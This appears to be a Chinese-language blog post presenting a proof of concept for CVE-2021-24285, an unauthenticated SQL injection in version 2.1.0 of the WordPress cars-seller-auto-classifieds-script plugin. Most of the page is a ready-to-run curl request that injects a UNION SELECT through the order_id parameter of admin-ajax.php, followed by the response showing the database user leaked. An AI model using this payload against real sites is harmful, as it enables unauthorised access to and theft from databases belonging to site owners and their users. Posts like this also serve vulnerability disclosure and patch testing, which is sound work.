CVE​​-2021-24285_WordPress_SQL注入漏洞

# CVE​​-2021-24285 WordPress SQL注入漏洞
==簡介==
插件名稱:wp-plugin:cars-seller-auto-classifieds-script

受影響的版本:2.1.0(如果有,則可能是較低版本)

漏洞:注入

所需的最低訪問級別:未認證

==POC==

curl 'http:///wp-admin/admin-ajax.php' \
  --data-raw 'action=request_list_request&order_id=-1662 UNION ALL SELECT NULL,NULL,current_user(),current_user(),current_user(),NULL,current_user(),current_user(),NULL-- -' \
  --compressed \
  --insecure

     

Request Details

Request Id
Car TitleUntitled
Namebob@localhost bob@localhost
Emailbob@localhost
Phonebob@localhost
Messagebob@localhost
Reply

Close

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容